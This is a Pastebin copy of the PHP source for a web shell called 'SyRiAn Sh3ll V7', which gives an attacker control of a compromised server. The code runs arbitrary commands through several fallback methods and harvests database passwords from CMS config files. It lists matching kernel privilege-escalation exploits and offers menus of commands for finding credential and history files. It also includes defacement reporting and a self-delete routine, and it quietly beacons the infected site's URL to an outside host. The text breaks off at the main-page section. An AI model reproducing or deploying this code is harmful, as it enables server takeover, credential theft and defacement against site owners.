Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- # .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
- # ,--^----------,--------,-----,-------^--,
- # | ||||||||| `--------' | O .. SyRiAn Sh3ll V7 ....
- # `+---------------------------^----------|
- # `\_,-------, __EH << SyRiAn | 34G13__|
- # / XXXXXX /`| /
- # / XXXXXX / `\ /
- # / XXXXXX /\______(
- # / XXXXXX /!
- # / XXXXXX /! rep0rt bugz t0: sy34[at]msn[dot]com
- # (________(!
- # `-------'
- #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
- #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
- #
- # SyRiAn Sh3ll V7 .
- # Copyright (C) 2011 - SyRiAn 34G13
- # This program is free software; you can redistribute it and/or modify
- # it under the terms of the GNU General Public License as published by
- # the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
- # This program is distributed in the hope that it will be useful,
- # but WITHOUT ANY WARRANTY; without even the implied warranty of
- # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
- # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
- # Coders :
- # SyRiAn_34G13 : sy34@msn.com [ Main Coder ] .
- # SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
- # Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
- #// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
- $uselogin = 0; // Make It 0 If you Want To Disable Auth
- $user = ''; // Username
- $pass = ''; // Password
- $shellColor = '#990000'; // Shell Color
- #------------------------------------#
- # Powered By SyRiAn Shell #
- # By EH SyRiAn 34G13 #
- # wWw.syrian-shell.com #
- # Version 7 - priv8 #
- # Made In SyRiA #
- #------------------------------------#
- ?>
- <?php
- if($_GET['id']== 'logout')
- {
- Logout();
- }
- # ---------------------------------------#
- # SuiCide #
- #----------------------------------------#
- if($_GET['id'] == 100)
- {
- echo "<body onload='Suicide();'>";
- }
- if($_GET['id'] == 'Delete')
- {
- Suicide();
- }
- # ---------------------------------------#
- # Functions #
- #----------------------------------------#
- function input($type,$name,$value,$size)
- {
- if (empty($value))
- {
- print "<input type=$type name=$name size=$size>";
- }
- elseif(empty($name)&&empty($size))
- {
- print "<input type=$type value=$value >";
- }
- elseif(empty($size))
- {
- print "<input type=$type name=$name value=$value >";
- }
- else
- {
- print "<input type=$type name=$name value=$value size=$size >";
- }
- }
- function read_dir($path,$username)
- {
- if ($handle = opendir($path))
- {
- while (false !== ($file = readdir($handle)))
- {
- $fpath="$path$file";
- if (($file!='.') and ($file!='..'))
- {
- if (is_readable($fpath))
- {
- $dr="$fpath/";
- if (is_dir($dr))
- {
- read_dir($dr,$username);
- }
- else
- {
- if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
- ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
- {
- $pass=get_pass($fpath);
- if ($pass!='')
- {
- echo "[+] $fpath\n$pass\n";
- ftp_check($username,$pass);
- }
- }
- }
- }
- }
- }
- }
- }
- function get_pass($link)
- {
- @$config=fopen($link,'r');
- while(!feof($config))
- {
- $line=fgets($config);
- if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
- {
- if (strrpos($line,'"'))
- $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
- else
- $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
- return $pass;
- }
- }
- }
- function GetRealIP()
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
- curl_setopt($ch, CURLOPT_REFERER, $urls);
- $html = curl_exec($ch);
- if (getenv(HTTP_X_FORWARDED_FOR))
- {
- $ip=getenv(HTTP_X_FORWARDED_FOR);
- }
- elseif (getenv(HTTP_CLIENT_IP))
- {
- $ip=getenv(HTTP_CLIENT_IP);
- }
- else
- {
- $ip=getenv(REMOTE_ADDR);
- }
- return $ip;
- }
- function openBaseDir()
- {
- $openBaseDir = ini_get("open_basedir");
- if (!$openBaseDir)
- {
- $openBaseDir = '<font color="green">OFF</font>';
- }
- else
- {
- $openBaseDir = '<font color="red">ON</font>';
- }
- return $openBaseDir;
- }
- function str_hex($string)
- {
- $hex='';
- for ($i=0; $i < strlen($string); $i++)
- {
- $hex .= dechex(ord($string[$i]));
- }
- return $hex;
- }
- function SafeMode()
- {
- $safe_mode = ini_get("safe_mode");
- if (!$safe_mode)
- {
- $safe_mode = '<font color="green">OFF</font>';
- }
- else
- {
- $safe_mode = '<font color="red">ON</font>';
- }
- return $safe_mode;
- }
- function currentFileName()
- {
- $currentFileName = $_SERVER["SCRIPT_NAME"];
- $currentFileName = Explode('/', $currentFileName);
- $currentFileName = $currentFileName[count($currentFileName) - 1];
- return $currentFileName;
- }
- function Suicide()
- {
- @unlink(currentFileName());
- }
- function rootxpL()
- {
- $v=@php_uname();
- $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
- h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
- krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
- krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
- ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
- uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2,
- ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
- kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
- uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
- foreach($db as $k=>$x)if(strstr($v,$k))return $x;
- if(!$xpl)$xpl='<font color="red">Not found.</font>';
- return $xpl;
- }
- function PostgreSQL()
- {
- if(@function_exists('pg_connect'))
- {
- $postgreSQL = '<font color="red">ON</font>';
- }
- else
- {
- $postgreSQL = '<font color="green">OFF</font>';
- }
- return $postgreSQL;
- }
- function Oracle()
- {
- if(@function_exists('ocilogon'))
- {
- $oracle = '<font color="red">ON</font>';
- }
- else
- {
- $oracle = '<font color="green">OFF</font>';
- }
- return $oracle;
- }
- function ZoneH($url, $hacker, $hackmode,$reson, $site )
- {
- $k = curl_init();
- curl_setopt($k, CURLOPT_URL, $url);
- curl_setopt($k,CURLOPT_POST,true);
- curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
- curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
- $kubra = curl_exec($k);
- curl_close($k);
- return $kubra;
- }
- function MsSQL()
- {
- if(@function_exists('mssql_connect'))
- {
- $msSQL = '<font color="red">ON</font>';
- }
- else
- {
- $msSQL = '<font color="green">OFF</font>';
- }
- return $msSQL;
- }
- function MySQL2()
- {
- $mysql_try = function_exists('mysql_connect');
- if($mysql_try)
- {
- $mysql = '<font color="red">ON</font>';
- }
- else
- {
- $mysql = '<font color="green">OFF</font>';
- }
- return $mysql;
- }
- function Gzip()
- {
- if (function_exists('gzencode'))
- {
- $gzip = '<font color="red">ON</font>';
- }
- else
- {
- $gzip = '<font color="green">OFF</font>';
- }
- return $gzip;
- }
- function MysqlI()
- {
- if (function_exists('mysqli_connect'))
- {
- $mysqli = '<font color="red">ON</font>';
- }
- else
- {
- $mysqli = '<font color="green">OFF</font>';
- }
- return $mysqli;
- }
- function MSQL()
- {
- if (function_exists('msql_connect'))
- {
- $mSql = '<font color="red">ON</font>';
- }
- else
- {
- $mSql = '<font color="green">OFF</font>';
- }
- return $mSql;
- }
- function SQlLite()
- {
- if (function_exists('sqlite_open'))
- {
- $SQlLite = '<font color="red">ON</font>';
- }
- else
- {
- $SQlLite = '<font color="green">OFF</font>';
- }
- return $SQlLite;
- }
- function tulis($file,$text)
- {
- $textz = gzinflate(base64_decode($text));
- if($filez = @fopen($file,"w"))
- {
- @fputs($filez,$textz); @fclose($file);
- }
- }
- function RegisterGlobals()
- {
- if(ini_get('register_globals'))
- {
- $registerg= '<font color="red">ON</font>';
- }
- else
- {
- $registerg= '<font color="green">OFF</font>';
- }
- return $registerg;
- }
- function HardSize($size)
- {
- if($size >= 1073741824)
- {
- $size = @round($size / 1073741824 * 100) / 100 . " GB";
- }
- elseif($size >= 1048576)
- {
- $size = @round($size / 1048576 * 100) / 100 . " MB";
- }
- elseif($size >= 1024)
- {
- $size = @round($size / 1024 * 100) / 100 . " KB";
- }
- else
- {
- $size = $size . " B";
- }
- return $size;
- }
- function Curl()
- {
- if(extension_loaded('curl'))
- {
- $curl = '<font color="red">ON</font>';
- }
- else
- {
- $curl = '<font color="green">OFF</font>';
- }
- return $curl;
- }
- function DecryptConfig()
- {
- @include("DecryptConfig.php");
- if($_POST['ScriptType'] == 'vb')
- {
- $dbName = $config['Database']['dbname'];
- $prefix = $config['Database']['tableprefix'];
- $email = $config['Database']['technicalemail'];
- $host = $config['MasterServer']['servername'];
- $port = $config['MasterServer']['port'];
- $user = $config['MasterServer']['username'];
- $pass = $config['MasterServer']['password'];
- $admincp = $config['Misc']['admincpdir'];
- $modecp = $config['Misc']['modcpdir'];
- }
- elseif($_POST['ScriptType'] == 'wp')
- {
- $dbName = DB_NAME;
- $prefix = $table_prefix;
- $host = DB_HOST;
- $user = DB_USER;
- $pass = DB_PASS;
- }
- elseif($_POST['ScriptType'] == 'jos')
- {
- $dbName = $db;
- $prefix = $dbprefix;
- $email = $mailfrom;
- $host = $host;
- $user = $user;
- $pass = $password;
- }
- elseif($_POST['ScriptType'] == 'phpbb')
- {
- $host = $dbhost;
- $port = $dbport;
- $dbName = $dbname;
- $user = $dbuser;
- $pass = $dbpasswd;
- $prefix = $table_prefix;
- }
- elseif($_POST['ScriptType'] == 'ipb')
- {
- $host = $INFO['sql_host'];
- $dbName = $INFO['sql_database'];
- $user = $INFO['sql_user'];
- $pass = $INFO['sql_pass'];
- $prefix = $INFO['sql_tbl_prefix'];
- }
- elseif($_POST['ScriptType'] == 'smf')
- {
- $dbName = $db_name;
- $pass = $db_passwd;
- $prefix = $db_prefix;
- $host = $db_server;
- $user = $db_user;
- $email = $webmaster_email;
- }
- elseif($_POST['ScriptType'] == 'mybb')
- {
- $host = $config['database']['hostname'];
- $user = $config['database']['username'];
- $pass = $config['database']['password'];
- $dbName = $config['database']['database'];
- $prefix = $config['database']['table_prefix'];
- $admincp = $config['admin_dir'];
- $prefix = $config['database']['table_prefix'];
- }
- echo '
- #-------------------------------#
- # Config Informations #
- #-------------------------------#
- Host : '.$host.'
- DB Name : '.$dbName.'
- DB User : '.$user.'
- DB Pass : '.$pass.'
- Prefix : '.$prefix.'
- Email : '.$email.'
- Port : '.$port.'
- ACP : '.$admincp.'
- MCP : '.$modecp.'
- ';
- }
- function footer()
- {
- echo '<table bgcolor="#cccccc" width="100%"><tr>
- <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
- <center><font color="gray" size="-2"><b>
- </font><font color="gray"></font><font color="#990000">
- </font><font color="gray"></font><font color="#990000"> v7 Features;
- </font></b>
- </td>
- </tr></table>
- </tbody></table>
- <a name="down"></a>
- </body></html>
- ';
- }
- function whereistmP()
- {
- $uploadtmp=ini_get('upload_tmp_dir');
- $uf=getenv('USERPROFILE');
- $af=getenv('ALLUSERSPROFILE');
- $se=ini_get('session.save_path');
- $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
- if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
- if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
- if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
- if(is_dir($uf) && is_writable($uf))return $uf;
- if(is_dir($af) && is_writable($af))return $af;
- if(is_dir($se) && is_writable($se))return $se;
- if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
- if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
- return '.';
- }
- function winshelL($command)
- {
- $name=whereistmP()."\\".uniqid('NJ');
- win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
- sleep(1);
- $exec=file_get_contents($name);
- unlink($name);
- return $exec;
- }
- function update()
- {
- echo "[+] Update Has D0n3 ^_^";
- }
- function srvshelL($command)
- {
- $name=whereistmP()."\\".uniqid('NJ');
- $n=uniqid('NJ');
- $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
- win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
- win32_start_service($n);
- win32_stop_service($n);
- win32_delete_service($n);
- while(!file_exists($name))sleep(1);
- $exec=file_get_contents($name);
- unlink($name);
- return $exec;
- }
- function ffishelL($command)
- {
- $name=whereistmP()."\\".uniqid('NJ');
- $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
- $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
- while(!file_exists($name))sleep(1);
- $exec=file_get_contents($name);
- unlink($name);
- return $exec;
- }
- function comshelL($command,$ws)
- {
- $exec=$ws->exec("cmd.exe /c $command");
- $so=$exec->StdOut();
- return $so->ReadAll();
- }
- function perlshelL($command)
- {
- $perl=new perl();
- ob_start();
- $perl->eval("system(\"$command\")");
- $exec=ob_get_contents();
- ob_end_clean();
- return $exec;
- }
- function Exe($command)
- {
- global $windows;
- $exec=$output='';
- $dep[]=array('pipe','r');$dep[]=array('pipe','w');
- if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
- elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
- elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
- elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
- elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
- elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
- $output;proc_close($res);}
- elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
- elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
- elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
- elseif(extension_loaded('perl'))$exec=perlshelL($command);
- return $exec;
- }
- function magicQouts()
- {
- $mag=get_magic_quotes_gpc();
- if (empty($mag))
- {
- $mag = '<font color="green">OFF</font>';
- }
- else
- {
- $mag= '<font color="red">ON</font>';
- }
- return $mag;
- }
- function DisableFunctions()
- {
- $disfun = ini_get('disable_functions');
- if (empty($disfun))
- {
- $disfun = '<font color="green">NONE</font>';
- }
- return $disfun;
- }
- function SelectCommand($os)
- {
- if($os == 'Windows')
- {
- echo "
- <select name=alias >
- <option value=''>NONE</option>
- <option value='dir' >List Directory</option>
- <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
- <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir
- </option>
- <option value='netstat -an'>Show active connections</option>
- <option value='net start'>Show running services</option>
- <option value='tasklist'>Show Pro</option>
- <option value='net user'>User accounts</option>
- <option value='net view'>Show computers</option>
- <option value='arp -a'>ARP Table</option>
- <option value='ipconfig /all'>IP Configuration</option>
- <option value='netstat -an'>netstat -an</option>
- <option value='systeminfo'>System Informations</option>
- <option value='getmac'>Get Mac Address</option>
- </select>
- ";
- }
- else
- {
- echo "
- <select name=alias >
- <option value=''>NONE</option>
- <option value='ls -la'>List dir</option>
- <option value='cat /etc/hosts'>IP Addresses</option>
- <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
- <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
- <option value='netstat -an | grep -i listen'>show opened ports</option>
- <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
- <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
- <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
- <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
- <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
- <option value='find / -type f -name \"config*\"'>find config* files</option>
- <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
- <option value='find / -perm -2 -ls'>find all writable folders and files</option>
- <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
- <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
- <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
- <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
- <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
- <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
- <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
- <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
- <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
- <option value='locate httpd.conf'>locate httpd.conf files</option>
- <option value='locate vhosts.conf'>locate vhosts.conf files</option>
- <option value='locate proftpd.conf'>locate proftpd.conf files</option>
- <option value='locate psybnc.conf'>locate psybnc.conf files</option>
- <option value='locate my.conf'>locate my.conf files</option>
- <option value='locate admin.php'>locate admin.php files</option>
- <option value='locate cfg.php'>locate cfg.php files</option>
- <option value='locate conf.php'>locate conf.php files</option>
- <option value='locate config.dat'>locate config.dat files</option>
- <option value='locate config.php'>locate config.php files</option>
- <option value='locate config.inc'>locate config.inc files</option>
- <option value='locate config.inc.php'>locate config.inc.php</option>
- <option value='locate config.default.php'>locate config.default.php files</option>
- <option value='locate config'>locate config* files </option>
- <option value='locate \'.conf\''>locate .conf files</option>
- <option value='locate \'.pwd\''>locate .pwd files</option>
- <option value='locate \'.sql\''>locate .sql files</option>
- <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
- <option value='locate \'.bash_history\''>locate .bash_history files</option>
- <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
- <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
- <option value='locate backup'>locate backup files</option>
- <option value='locate dump'>locate dump files</option>
- <option value='locate priv'>locate priv files</option>
- </select>
- ";
- }
- }
- function GenerateFile($name,$content)
- {
- $file = @fopen($name,"w+");
- @fwrite($file,$content);
- @fclose($file);
- return true;
- }
- function which($pr)
- {
- $path = Exe("which $pr");
- if(!empty($path))
- {
- return trim($path);
- }
- else
- {
- return trim($pr);
- }
- }
- function checkfunctioN($func)
- {
- global $disablefunctions,$safemode;
- $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
- if($safemode=='ON' && in_array($func,$safe))return 0;
- elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
- return 0;
- }
- function CSS($shellColor)
- {
- $css = "
- <html dir=rtl>
- <head>
- <title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
- <link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
- <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
- <style>
- BODY
- {
- FONT-FAMILY: Verdana;
- margin: 2;
- color: #cccccc;
- background-color: #000000;
- }
- sy
- {
- color:".$shellColor.";
- font-size:7pt;
- font-weight: bold;
- }
- #Box
- {
- color:".$shellColor.";
- font-size:14px;
- background-color:#000;
- font-weight:bold;
- }
- tr
- {
- BORDER-RIGHT: #cccccc 1px solid;
- BORDER-TOP: #cccccc 1px solid;
- BORDER-LEFT: #cccccc 1px solid;
- BORDER-BOTTOM: #cccccc 1px solid;
- color: #ffffff;
- }
- td
- {
- BORDER-RIGHT: #cccccc 1px solid;
- BORDER-TOP: #cccccc 1px solid;
- BORDER-LEFT: #cccccc 1px solid;
- BORDER-BOTTOM: #cccccc 1px solid;
- color: #cccccc;
- }
- .table1
- {
- BORDER: 1px none;
- BACKGROUND-COLOR: #000000;
- color: #333333
- }
- .td1
- {
- BORDER: 1px none;
- color: #ffffff; font-style:normal;
- font-variant:normal;
- font-weight:normal;
- font-size:7pt;
- font-family:tahoma
- }
- .tr1
- {
- BORDER: 1px none;
- color: #cccccc;
- }
- table
- {
- BORDER: #eeeeee outset;
- BACKGROUND-COLOR: #000000;
- color: #cccccc;
- }
- input
- {
- BORDER-RIGHT: ".$shellColor." 1px solid;
- BORDER-TOP: ".$shellColor." 1px solid;
- BORDER-LEFT: ".$shellColor." 1px solid;
- BORDER-BOTTOM: ".$shellColor." 1px solid;
- BACKGROUND-COLOR: #333333;
- font: 9pt tahoma;
- color: #ffffff;
- }
- select
- {
- BORDER-RIGHT: #ffffff 1px solid;
- BORDER-TOP: #999999 1px solid;
- BORDER-LEFT: #999999 1px solid;
- BORDER-BOTTOM: #ffffff 1px solid;
- BACKGROUND-COLOR: #000000;
- font: 9pt tahoma;
- color: #CCCCCC;;
- }
- submit
- {
- BORDER: 1px outset buttonhighlight;
- BACKGROUND-COLOR: #272727;
- width: 40%;
- color: #cccccc;
- }
- textarea
- {
- BORDER-RIGHT: #ffffff 1px solid;
- BORDER-TOP: #999999 1px solid;
- BORDER-LEFT: #999999 1px solid;
- BORDER-BOTTOM: #ffffff 1px solid;
- BACKGROUND-COLOR: #333333;
- color: #ffffff;
- }
- A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
- A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
- A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
- A:hover {color:blue;TEXT-DECORATION: none}
- </style>
- <script>
- function Suicide()
- {
- var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
- if(confimrSuicide == true)
- {
- document.location='".currentFileName()."?id=Delete';
- }
- else {document.location='".currentFileName()."';}
- }
- </script>
- </head>";
- if($_GET['id'] == '')
- {
- $css .= "<script>window.location = '?id=mainPage';</script>";
- }
- return $css;
- }
- function Logout()
- {
- print"<script>
- document.cookie='user=';
- document.cookie='pass=';
- var url = window.location.pathname;
- var filename = url.substring(url.lastIndexOf('/')+1);
- window.location=filename;
- </script>";
- }
- function About()
- {
- $about = "
- <table bgcolor=#cccccc width=\"100%\">
- <tbody><tr><td width=1025>
- <div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
- </div>
- <sy><div align=center>Coded By : EH << SyRiAn | 34G13</div></sy>
- <sy><div align=center>From </font>: SyRiAn Arabic Republic </div></sy>
- <sy><div align=center>Age : 4/1991<br></div></sy>
- <sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
- <sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
- <sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
- <br/>
- <center>
- <br/>
- <form method='POST'>
- <input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
- <textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
- <input type='submit' value='Submit' name='sendEmail' />
- </form></center>
- </td></tr></tbody></table>";
- return $about;
- }
- echo CSS($shellColor);
- # ---------------------------------------#
- # Authentication #
- #----------------------------------------#
- if ($uselogin ==1)
- {
- if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
- {
- if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
- {
- print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
- }
- else
- {
- if($_POST['usrname'])
- {
- print'<script>alert("Go and play in the street man !!");</script>';
- }
- echo '
- <body bgcolor="black"><br><br>
- <center><font color=#990000 size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></font><br>
- <img src="http://www.syrian-shell.com/eagle.jpg">
- </center>
- <div align="center">
- <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
- <input dir="ltr" name="usrname" value="userName" type="text" size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><br>
- <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';" /><br>
- <input type="submit" value=" Login " name="login" />
- </form></p>';
- exit;
- }
- }
- }
- # ---------------------------------------#
- # Some Info #
- #----------------------------------------#
- $dir = getcwd();
- $uname= @php_uname();
- if(strlen($dir)>1 && $dir[1]==":")
- $os = "Windows";
- else $os = "Linux";
- $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
- $server = @substr($SERVER_SOFTWARE,0,120);
- echo "
- <body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
- <p dir=ltr> </p>
- <div dir=ltr align=center><font size=4><b>
- <img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93> </b></font><div
- dir=ltr align=center><span style=height: 25px;><b>
- <font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color:
- #990000><p></p></span></span></div></td><td
- bgcolor=#000000>
- <p dir=ltr><font size=1> <b>[<a href=?id=mainPage>Main</a>]</b></span>
- <font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
- <b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
- <b>[</span><a href=?id=about>About</a>]</b></span>
- <b>[</span><a href=?id=logout>Logout</a>]</b></span>
- <b>[</span><a href=?id=100>SuiCide</a>]</b></span>
- <br>
- <font size=1><br>
- Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
- System = <sy>".$os."</sy>
- Magic_Quotes = <sy>". @magicQouts()." </sy>
- Curl = <sy>".@Curl()." </sy>
- Register Globals = <sy>".@RegisterGlobals()." </sy>
- Open Basedir = <sy>".@openBaseDir()." </sy>
- <br>
- Gzip = <sy>".@Gzip()."</sy>
- MySQLI = <sy>".@MysqlI()." </sy>
- MSQL = <sy>".@MSQL()."</sy>
- SQL Lite = <sy>".@SQlLite()."</sy>
- Usefull Locals = <sy>".rootxpL()." </sy>
- <br>
- Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
- Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
- PHP Version = <sy>".@phpversion()." </sy>
- Zend Version = <sy>".@zend_version()." </sy>
- MySQL Version = <sy>".@mysql_get_server_info()." </sy>
- <br>
- MySQL = ".MySQL2()."
- MsSQL = ".MsSQL()."
- PostgreSQL = ".PostgreSQL()."
- Oracle = ".Oracle()."
- Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
- Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
- <br>
- Dis_Functions = <sy>". DisableFunctions()." </sy><br>
- Your IP = <sy>".GetRealIP()." </sy>
- Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
- </sy></a>
- [</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
- Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
-
- [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
- [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
- [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
- <br>
- <br>
- <table bgcolor=#cccccc width=\"100%\"><tbody><tr>
- <td align=right width=100><p dir=ltr>
- <sy> Server : <br>
- <b>uname -a :
- <br>pwd : </span> <br>ID : </span> <br></b></sy></td><td>
- <p dir=ltr><font color=#cccccc size=-2><b> ".$server."
- <br> ".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br> ".
- $dir."<br> ".Exe('id')."</b>
- </font></td></tr></tbody>
- </table>
- [<a href='#down'>Down</a>]
- [<a href='javascript:window.print()'>Print</a>]
- </table>";
- # ---------------------------------------#
- # Main Page #
- #----------------------------------------#
- if ($_GET['id']== 'mainPage')
- {
